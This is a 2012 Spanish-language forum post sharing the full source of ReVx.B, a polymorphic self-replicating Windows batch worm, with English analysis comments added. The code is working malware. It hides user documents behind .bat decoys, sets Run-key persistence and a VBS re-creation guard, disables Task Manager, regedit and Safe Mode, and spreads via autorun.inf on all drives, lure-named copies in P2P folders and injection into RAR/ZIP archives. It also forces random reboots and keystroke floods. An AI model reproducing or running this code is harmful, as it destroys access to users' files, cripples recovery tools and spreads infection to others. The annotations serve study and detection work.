[Batch] ReVx.B

Iniciado por Binary_Death, 21 Junio 2012, 21:22 PM




@Echo Off %Header0% %_vx_%
REM ===========================================================================
REM  ReVx.B - self-replicating Windows batch malware posted to a forum in 2012.
REM  This listing is annotated for analysis only. Do not run it outside an
REM  isolated, disposable virtual machine: it rewrites user files, registry
REM  policies and every drive letter it can reach, and none of that is undone.
REM ===========================================================================
REM  Line tags. Every line ends with one or more undefined variables, the vx
REM  tag, an m-number tag or the Header-0 tag. They expand to nothing at run
REM  time; their only role is to let Find select lines by tag when the file
REM  rebuilds itself, see :_polymorphism and :_Infect.
REM
REM  Bootstrap, tagged Header-0 and vx. The first argument selects the label:
REM    none   - first launch: relaunch hidden, then quit this visible window
REM    Hidden - hidden instance: fall through to configuration and :_main
REM    Mod_N  - one worker instance per module, jumps straight to that label
SetLocal EnableDelayedExpansion %Header0% %_vx_%
GoTo :_%~1 %Header0% %_vx_%
:_Hidden %Header0% %_vx_%
:_ %Header0% %_vx_%
REM Copy self into the temp directory and work from there.
Chdir "%temp%" & Copy /y "%~0" "%temp%" %Header0% 1>nul 2>&1 %Header0% %_vx_%
If "%~1" NEQ "Hidden" ( %Header0% %_vx_%
REM Not hidden yet: write the VBS launcher from :_vbs, start it, exit.
call :_vbs>vbs.vbs & start vbs.vbs %Header0% %_vx_%
exit %Header0% %_vx_%
) else (GoTo :_code) %Header0% %_vx_%
REM VBS launcher, echoed into vbs.vbs: relaunch the temp copy with the Hidden
REM argument via WScript.Shell.Run and vbHide, so no console window appears.
REM On Error Resume Next hides any failure.
:_vbs %Header0% %_vx_%
Echo.On Error Resume Next %Header0% %_vx_%
Echo.SET a=CreateObject^("WScript.Shell"^) %Header0% %_vx_%
Echo a.Run """%~n0%~x0"" Hidden", vbHide %Header0% %_vx_%
GoTo:EoF %Header0% %_vx_%
REM Hidden instance continues here: remove the launcher, fall through to config.
:_code %Header0% %_vx_%
del /q vbs.vbs %Header0% %_vx_%

REM Configuration. Worker instances started from :_main skip these lines, see the
REM note there. __dir0 is this file as invoked; the path variables are filled in
REM by :_SetPrivs.
Set "__dir0=%~0" %_vx_%
Set "__ext0=%~x0" %_vx_%
Set "__siz0=%~z0" %_vx_%
REM Set to 1 by :_AdminRequest when the user is taken to be an administrator.
Set "__admin=0" %_vx_%
Set "__path=" %_vx_%
REM __ipath: root of the tree Mod_1 and Mod_5 walk. __vpath: the rebuilt copy
REM that gets persisted. __spath: hidden stash for the original user files.
REM __adpath: the VBS guard script written by Mod_0.
Set "__ipath=" %_vx_%
Set "__vpath=" %_vx_%
Set "__spath=" %_vx_%
Set "__adpath=" %_vx_%
REM Module numbers that :_main launches as separate hidden instances.
Set "__modules=0,1,2,3,4,5" %_vx_%
REM File types Mod_1 replaces with batch decoys. Note pptx is listed twice.
Set __iext=*.doc *.docx *.xls *.xlsx *.ppt *.pps *.pptx *.pptx *.wmv *.pdf %_vx_%^
*.jpg *.jpeg *.bmp *.gif *.mp3 *.mp4 *.avi *.mpg *.mpeg *.divx *.png *.psd %_vx_%

:_main %_vx_%
REM Pick admin or restricted paths, then build a reordered copy of this file at __vpath.
Call :_AdminRequest & Call :_SetPrivs %_vx_%
REM Polymorphism: the copy is assembled from tagged lines, not copied verbatim.
REM First every vx-tagged line, retried until Find succeeds; then the eleven
REM m-tagged blocks in a random order, each followed by a junk :: comment line of
REM random length, so each generation differs in block order and filler lines.
:_polymorphism %_vx_%
Find "_vx_"<"%__dir0%">"%__vpath%" || GoTo :_polymorphism %_vx_%
For /l %%x in (0,1,10) do ( %_vx_%
call :SetMod "mod" %_vx_%
find "_m!mod!_"<"%__dir0%">>"%__vpath%" %_vx_%
call :_GenRan !random:~0,2! %_vx_%
Echo.::!rstr!>>"%__vpath%" %_vx_%
) %_vx_%
REM Launch one hidden, high-priority instance per module in __modules. Each one
REM jumps from the GoTo at the top straight to its label, never executing the
REM Set lines above, so it presumably relies on inheriting the __ variables
REM from this process environment.
For %%x in (%__modules%) do Start "" /B /high "%__dir0%" Mod_%%x %_vx_%
EXIT %_vx_%
REM Choose a random module number 0..10 whose block is not already in __vpath.
:SetMod %_vx_%
set/a "%~1=%random% %% 11" %_vx_%
(find "_m%mod%_"<"%__vpath%" 1>nul 2>&1) && (GoTo:SetMod) %_vx_%
GoTo:EoF %_vx_%
:_Mod_0 %_m0_%
REM Module 0: persistence. Autostart value named with a single 0xFF character
REM under the per-user Run key, pointing at the rebuilt copy. Mod_4 writes the
REM same value again.
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ÿ" /d "%__vpath%" /f %_m0_%
REM Guard script written to __adpath: reads the dropped copy into memory once,
REM then busy-loops forever recreating it whenever it goes missing. This is what
REM the author means by preventing deletion of the source file. Backslashes in
REM the path are doubled; On Error Resume Next hides failures.
( %_m0_%
Echo.On Error Resume Next %_m0_%
Echo.Set b = CreateObject^("Scripting.FileSystemObject"^) %_m0_%
Echo.Set Ha = b.OpenTextFile^("%__vpath:\=\\%"^) %_m0_%
Echo.Contn = Ha.ReadAll %_m0_%
Echo.Do %_m0_%
Echo.If not^(b.FileExists^("%__vpath:\=\\%"^)^) Then %_m0_%
Echo.Set Hb = b.CreateTextFile^("%__vpath:\=\\%"^) %_m0_%
Echo.Hb.Write Contn %_m0_%
Echo.Hb.Close %_m0_%
Echo.End If %_m0_%
Echo.Loop %_m0_%
) 1>"%__adpath%" 2>nul %_m0_%
Start "" "%__adpath%" %_m0_%
EXIT %_m0_%

:_Mod_1 %_m1_%
REM Module 1: decoy replacement, loops forever. Walks __ipath for every extension
REM in __iext, moves each file into the hidden stash __spath under a random name
REM of up to 16 characters plus the original extension, marks it system and
REM hidden, and writes in its place a batch file named original-name.ext.bat,
REM produced by :_Infect, which opens the stashed original and then runs this
REM malware. With HideFileExt set by Mod_2 the .bat suffix is not displayed.
REM Files already inside __spath are skipped.
Chdir "%__ipath%" %_m1_%
For /f "tokens=*" %%_ in ('dir /b /s %__iext%') do ( %_m1_%
if "%%~dp_" NEQ "%__spath%\" ( %_m1_%
call :_GenRan 16 %_m1_%
move /y "%%_" "%__spath%\!rstr!%%~x_" %_m1_%
attrib +s +h "%__spath%\!rstr!%%~x_" %_m1_%
call :_Infect "%__spath%\!rstr!%%~x_" 1>"%%_.bat" 2>nul %_m1_%
) %_m1_%
) %_m1_%
GoTo :_Mod_1 %_m1_%

:_Mod_2 %_m2_%
REM Module 2: cripple the user's recovery tools, re-applied in an endless loop.
REM All writes are per-user HKCU policies except the two SafeBoot deletions
REM under HKLM, which need admin rights and fail otherwise.
REM c__c is installed below as the cmd.exe AutoRun command, so every new cmd.exe
REM defines doskey macros aliasing tskill, taskkill, reg, cmd and doskey to exit.
Set "c__c=Doskey tskill=exit&Doskey taskkill=exit&Doskey reg=exit&Doskey cmd=exit&Doskey doskey=exit" %_m2_%
REM Disable Task Manager and the registry editor; remove Folder Options and the
REM right-click context menu in Explorer.
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f %_m2_%
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f %_m2_%
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t REG_DWORD /d 1 /f %_m2_%
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f %_m2_%
REM Hide known extensions, so the .bat decoys written by Mod_1 display under the
REM original file name.
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d 1 /f %_m2_%
REM Apparently meant to stop hidden files being shown, but this path lacks the
REM Explorer component used on the line above, so it presumably lands in an
REM inert key. That stray key is itself a useful artifact to look for.
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Advanced" /v "Hidden" /t REG_DWORD /d 0 /f %_m2_%
Reg Add "HKCU\Software\Microsoft\Command Processor" /v "AutoRun" /t REG_SZ /d "%c__c%" /f %_m2_%
REM Delete the Safe Mode driver lists, so the machine can no longer boot into Safe Mode.
Reg Delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\minimal" /f %_m2_%
Reg Delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\network" /f %_m2_%
GoTo :_Mod_2 %_m2_%

:_Mod_3 %_m3_%
REM Module 3: timed prank payload. Computes the next clock hour, busy-waits in
REM :_loop until the hour field of the time variable equals it, rolls three
REM independent dice, then loops to wait for the following hour.
REM The wait is a plain string compare: if the hour is space-padded, as the
REM time variable commonly is for hours below 10, the values never match and
REM this instance spins without firing; the 23 to 00 wrap has the same issue.
Set /a "hour=%time:~0,2% + 1" %_m3_%
If "%hour%" EQU "24" Set "hour=00" %_m3_%
:_loop %_m3_%
If "%time:~0,2%" NEQ "%hour%" GoTo :_loop %_m3_%
REM 1 in 6: beeps. A piped cmd with a crafted prompt writes a debug script to a
REM file named #, debug.exe then builds a one-byte file named @ holding 0x07
REM BEL, and type prints it a random number of times. Requires the 16-bit
REM debug.exe, which 64-bit Windows does not ship.
Set /a "Dice=%random% %% 6" %_m3_%
If "%Dice%" EQU "0" ( %_m3_%
Pushd "%cd%" %_m3_%
Chdir "%UserProfile%" %_m3_%
Exit|"%ComSpec%" /k prompt e$S100$S07$_n$S@$_rcx$_1$_w$_q$_># %_m3_%
debug<#>nul %_m3_%
for /l %%_ in (0,1,%random:~-3%) do type @ %_m3_%
Popd %_m3_%
) %_m3_%
REM 1 in 12: forced reboot in ten seconds behind a fake memory error message.
Set /a "ReBoot=%random% %% 12" %_m3_%
If "%ReBoot%" EQU "0" ( %_m3_%
shutdown -r -f -t 10 -c "Error 0x1445E5D9. The memory cannot be 'read'." %_m3_%
) %_m3_%
REM 1 in 12: drop skeys.vbs in the user profile, an endless loop typing REVX
REM into whatever window has focus, and start it.
Set /a "SendKeys=%random% %% 12" %_m3_%
If "%SendKeys%" EQU "0" ( %_m3_%
Pushd "%cd%" %_m3_%
Chdir "%UserProfile%" %_m3_%
( %_m3_%
Echo.Do %_m3_%
Echo.Set a = CreateObject^("WScript.Shell"^) %_m3_%
Echo.a.SendKeys "REVX" %_m3_%
Echo.Loop %_m3_%
)>skeys.vbs %_m3_%
start "" "skeys.vbs" %_m3_%
Popd %_m3_%
) %_m3_%
GoTo :_Mod_3 %_m3_%

:_Mod_4 %_m4_%
REM Module 4: drive spreading, loops forever so newly attached drives are hit
REM too. Re-asserts the same Run value as Mod_0, then for every drive letter A
REM to Z that exists copies this file, as invoked, to the root as revx.bat next
REM to an autorun.inf from :_Autorun, both marked system and hidden. Every
REM letter is tried, fixed and mapped drives included. Windows has ignored
REM autorun.inf on USB media since a 2011 update, so this presumably only
REM fires on older or unpatched systems.
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ÿ" /d "%__vpath%" /f %_m4_%
For %%_ in ( %_m4_%
A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z %_m4_%
) do ( %_m4_%
If Exist "%%_:\" ( %_m4_%
Copy /y "%__dir0%" "%%_:\revx.bat" %_m4_%
Call:_Autorun "revx.bat" 1>"%%_:\autorun.inf" 2>nul %_m4_%
Attrib +s +h "%%_:\revx.bat" %_m4_%
Attrib +s +h "%%_:\autorun.inf" %_m4_%
) %_m4_%
) %_m4_%
GoTo :_Mod_4 %_m4_%

:_Mod_5 %_m5_%
REM Module 5: seeding, runs once and exits. First clears the taskkill alias that
REM Mod_2 installs, apparently so the taskkill calls below work. If WinRAR is
REM installed the seed is revxp2p.rar in __ipath containing this file,
REM otherwise the seed is the bare .bat. WinRAR switches: -ep1 drop paths,
REM -ibck run in background, -inul no messages.
Doskey taskkill= %_m5_%
If Exist "%ProgramFiles%\WinRAR" ( %_m5_%
Set "ext_p2p=rar" %_m5_%
) else (Set "ext_p2p=bat") %_m5_%

If "%ext_p2p%" EQU "rar" ( %_m5_%
Set "path_p2p=%__ipath%\revxp2p.rar" %_m5_%
If Exist "!path_p2p!" Del /f /q "!path_p2p!" %_m5_%
Start /WAIT WinRAR.exe a "!path_p2p!" "%__dir0%" -ep1 -ibck -inul %_m5_%
taskkill /f /im "WinRAR.exe" %_m5_%
) else ( Set "path_p2p=%__dir0%" ) %_m5_%

REM Drop twelve lure-named copies, each with a random numeric suffix, into every
REM known P2P shared folder that exists. The folder list and the lure names are
REM useful detection artifacts.
For %%i in ( %_m5_%
"%ProgramFiles%\Kazaa\My Shared Folder", %_m5_%
"%ProgramFiles%\Kazaa Lite\My Shared Folder", %_m5_%
"%ProgramFiles%\Grokster\My Grokster", %_m5_%
"%ProgramFiles%\Morpheus\My Shared Folder", %_m5_%
"%ProgramFiles%\EDONKEY2000\incoming", %_m5_%
"%ProgramFiles%\Gnucleus\Downloads", %_m5_%
"%ProgramFiles%\eMule\Incoming", %_m5_%
"%ProgramFiles%\BearShare\Shared", %_m5_%
"%ProgramFiles%\Shareaza\Downloads", %_m5_%
"%ProgramFiles%\ICQ\shared files", %_m5_%
"%ProgramFiles%\Filetopia3\Files", %_m5_%
"%ProgramFiles%\appleJuice\incoming", %_m5_%
"%ProgramFiles%\LimeWire\Shared", %_m5_%
"%ProgramFiles%\Overnet\incoming", %_m5_%
"%ProgramFiles%\Swaptor\Download", %_m5_%
"%ProgramFiles%\WinMX\My Shared Folder", %_m5_%
"%ProgramFiles%\Tesla\Files", %_m5_%
"%ProgramFiles%\XoloX\Downloads", %_m5_%
"%ProgramFiles%\Rapigator\Share", %_m5_%
"%ProgramFiles%\KMD\My Shared Folder", %_m5_%
"%ProgramFiles%\Direct Connect\Received Files", %_m5_%
"%HomeDrive%\My Shared Folder", %_m5_%
"%UserProfile%\Desktop\My Shared Folder" %_m5_%
) do ( %_m5_%
If Exist "%%~i" ( %_m5_%
For %%d in ( %_m5_%
"MSN_emoticons","Horny_girls_get_fucked","Asian_teen_collection", %_m5_%
"Windows_7_gold_serials","MSN_hacking_code","Office_2010_activation_tool", %_m5_%
"Avatar_2009_subtitles","free_sms_tool", "Justin_Bieber-Believe", %_m5_%
"Twilight_e-book","Pitbull-I_know_you_want_me","Twilight_wallpapers" %_m5_%
) do ( Copy /y "%path_p2p%" "%%~i\%%~d_!random!.%ext_p2p%" ) %_m5_%
) ) %_m5_%

REM With WinRAR present, also inject this file into every .rar and .zip under
REM __ipath, one background WinRAR per archive, then kill WinRAR. This is the
REM archive handling the author describes for RAR and ZIP files.
If Exist "%ProgramFiles%\WinRAR" ( %_m5_%
For /f "Tokens=*" %%p in ( %_m5_%
'dir /b /s "%__ipath%\*.rar" "%__ipath%\*.zip"' %_m5_%
) do Start winRAR.exe a "%%~p" "%__dir0%" -ep1 -ibck -inul %_m5_%
taskkill /f /im "WinRAR.exe" %_m5_%
) %_m5_%

EXIT %_m5_%

:_AdminRequest %_m6_%
REM Decide whether the current user counts as an administrator. Starts the
REM Workstation service, lists local groups skipping four header lines and the
REM leading star, then lists the members of the FIRST group only: the GoTo after
REM the inner loop leaves the routine once that group is done. If the user name
REM appears among its members, __admin is set to 1.
REM That first group is presumably Administrators in the tested locales; net
REM output is locale and version dependent. The test is about membership, not
REM about the token: on Windows 7 with UAC an administrator still runs
REM unelevated, so the admin branch of :_SetPrivs may still fail on its HKLM
REM and system32 writes.
Net Start Workstation %_m6_%
For /f "tokens=1 delims=* skip=4" %%_ in ( %_m6_%
'Net LocalGroup' %_m6_%
) Do ( %_m6_%
For /f "tokens=* skip=6" %%# in ( %_m6_%
'Net LocalGroup %%_' %_m6_%
) Do ( %_m6_%
If "%%#" EQU "%UserName%" ( %_m6_%
Set "__admin=1" %_m6_%
GoTo :EoF %_m6_%
) %_m6_%
) %_m6_%
GoTo :EoF %_m6_%
) %_m6_%
GoTo :EoF %_m6_%

:_SetPrivs %_m7_%
REM Choose working paths from __admin. These are the on-disk indicators of the sample.
REM Administrator branch:
REM   stash dir    SystemRoot\system32 followed by one 0xFF character, a lookalike
REM                directory beside the real system32
REM   scan root    SystemDrive root, so Mod_1 rewrites files across the whole drive
REM   dropped copy SystemRoot\system32\drivers\keyboard.bat
REM   guard VBS    SystemRoot\wscript.exe.vbs
REM Restricted-user branch:
REM   hidden UserProfile\Config with Config\Startup as the stash, Config\config.bat
REM   as the dropped copy and Config\userlog.txt.vbs as the guard; scan root is
REM   UserProfile.
If "%__admin%" EQU "1" ( %_m7_%
Mkdir "%SystemRoot%\system32ÿ" %_m7_%
Set "__ipath=%SystemDrive%\" %_m7_%
Set "__vpath=%SystemRoot%\system32\drivers\keyboard.bat" %_m7_%
Set "__spath=%SystemRoot%\system32ÿ" %_m7_%
Set "__adpath=%SystemRoot%\wscript.exe.vbs" %_m7_%
) else ( %_m7_%
Mkdir "%UserProfile%\Config" %_m7_%
Mkdir "%UserProfile%\Config\Startup" %_m7_%
Attrib +s +h "%UserProfile%\Config" %_m7_%
Set "__ipath=%UserProfile%" %_m7_%
Set "__vpath=%UserProfile%\Config\config.bat" %_m7_%
Set "__spath=%UserProfile%\Config\Startup" %_m7_%
Set "__adpath=%UserProfile%\Config\userlog.txt.vbs" %_m7_%
) %_m7_%

GoTo :EoF %_m7_%

:_GenRan %_m8_%
REM Build rstr, a random string of up to N characters where N is the first
REM argument. Each position is either a digit, taken as the second character of
REM random, which is empty when random is a single digit, hence up to, or a
REM lowercase letter: a child cmd exits with a code in 97..122 and the letter is
REM read back through the undocumented ExitCodeAscii pseudo-variable, which
REM holds the last exit code as an ASCII character.
Set "rstr=" %_m8_%
For /l %%_ in (1,1,%~1) do ( %_m8_%
Set /a "rval=!random! %% 2" %_m8_%
If "!rval!" EQU "0" Set "rstr=!rstr!!random:~1,1!" %_m8_%
If "!rval!" EQU "1" ( %_m8_%
Set /a "rchr=(!random! %% 26) + 97" %_m8_%
"%ComSpec%" /c Exit /b !rchr! %_m8_%
Set "rstr=!rstr!!=ExitCodeAscii!" %_m8_%
) %_m8_%
) %_m8_%
Goto :EoF %_m8_%

:_Infect %_m9_%
REM Emit a decoy batch for the stashed file named in argument one, in this order:
REM   1. every line of this file carrying the Header-0 tag, i.e. the hidden
REM      relaunch bootstrap at the top;
REM   2. a start line that opens the stashed original at high priority, suffixed
REM      with an ampersand-double-colon marker so it can be recognised later;
REM   3. every remaining line that carries neither the Header-0 tag nor that
REM      marker, so a decoy built from an existing decoy does not accumulate
REM      launcher lines.
REM The tag and marker are assembled from insrt and mrk at run time so these
REM four lines never match their own Find filters.
Set "insrt=Header" & Set "mrk=__" %_m9_%
Find "%insrt%0"<"%__dir0%" %_m9_%
Echo.start "" "%~1" /high ^&::%mrk% %_m9_%
Find /v "%insrt%0"<"%__dir0%" | Find /v "&::%mrk%" %_m9_%
GoTo :EoF %_m9_%

:_Autorun %_m10_%
REM Emit an autorun.inf for the file named in argument one: open it on AutoPlay
REM and make it the default open action for the drive icon.
Echo.[AutoRun] %_m10_%
Echo.UseAutoPlay=1 %_m10_%
Echo.Open=%~1 %_m10_%
Echo.shell\open\command=%~1 %_m10_%
GoTo :EoF %_m10_%



Este es un pequeño malware polimórfico de hace un tiempo. Tiene el pan de cada día y algunas cosas curiosas, como la suplantación de ficheros de ciertas extensiones por copias del propio malware que a su vez antes de ejecutarse lanzarán el fichero original, dando el efecto de que no está corrupto.

Sigue este patrón para todos los ficheros excepto para los .RAR y .ZIP. Con estos intenta añadirse si es que está disponible el WinRAR.

Por otro lado, para asegurar su ejecución, hice que casi todo el código funcionara como usuario restringido o administrador, detectando en algunos casos en qué rutas puede trabajar y en cuales no por no tener acceso.

El payload no es nada del otro mundo, es más bien una broma. Es aleatorio, funciona en base a probabilidades, y lo que voy a describir ahora ocurre por cada instancia ejecutada en el equipo:

1/6 de probabilidad de un número aleatorio de pitidos
1/12 de probabilidad de reinicio forzado
1/12 de probabilidad de enviar repetidamente pulsaciones de teclado ("REVX") a la ventana activa

Hay que tener en cuenta que cada fichero reemplazado (que es prácticamente la totalidad de ficheros de uso común por el usuario) que sea ejecutado, iniciará una nueva instancia, así que lo que a priori son pocas probabilidades se van acumulando hasta que sea una hora punta y entonces se liberen.

Todo por supuesto se ejecuta ocultamente, usando (no había más remedio) VBS, que a su vez lo aproveché para impedir la eliminación del fichero origen del virus.

Tiene más cositas, pero a ver si las testeáis vosotros  ;)

El código está probado en Win XP y Win 7. Cualquier prueba debe hacerse en una máquina virtual aislada y desechable: el código reemplaza ficheros del usuario, modifica políticas del registro y escribe en todas las unidades, y nada de eso se deshace solo.

¡Un saludo!